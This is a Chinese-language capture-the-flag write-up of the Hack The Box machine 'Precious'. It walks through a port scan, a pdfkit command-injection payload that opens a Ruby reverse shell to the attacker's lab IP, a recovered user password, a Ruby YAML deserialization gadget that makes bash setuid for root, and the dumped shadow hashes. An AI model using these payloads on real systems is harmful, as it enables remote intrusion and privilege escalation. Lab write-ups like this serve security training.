基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV -Pn 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 15:24 CST
Nmap scan report for 10.10.11.189
Host is up (0.31s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 845e13a8e31e20661d235550f63047d2 (RSA)
| 256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_ 256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
2161/tcp filtered apc-agent
8045/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.64 seconds

80

需要加hosts:

1
10.10.11.189 precious.htb

输入URL转换成PDF:

pdfkit

测试pdf转换,发现使用pdfkit v0.8.6:

搜到相关漏洞:

reverse shell

打到ruby shell:

1
http://10.10.14.10:7777/?name=#{'%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.10",4444))'`'}

信息

bundle config中得到henry用户密码:

1
henry:Q3c1AqGHtoI0aXAYFH

user flag

henry用户ssh登录,得到user flag:

提权信息

sudo -l 发现一个ruby脚本,调用yaml,找到原本的yaml文件确认yaml库版本:

yaml

yaml反序列化:

提权 & root flag

构造一个恶意yml文件,调用ruby脚本触发命令执行:

dependencies.yml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: chmod +s /usr/bin/bash
method_id: :resolve

shadow

1
2
root:$y$j9T$a.ggVdbxv0sDezKDImKn91$BB2mMoZ0UwInxNcXuyDALhr4li59AHfVw5DuV0d5Ww1:19284:0:99999:7:::
henry:$y$j9T$Q/v28PgszKjK0KDbSATMs1$7K1zLKHnnClQLLI92aeVT9HQXA6bgaG4BOTgLTGi.gA:19261:0:99999:7:::

参考资料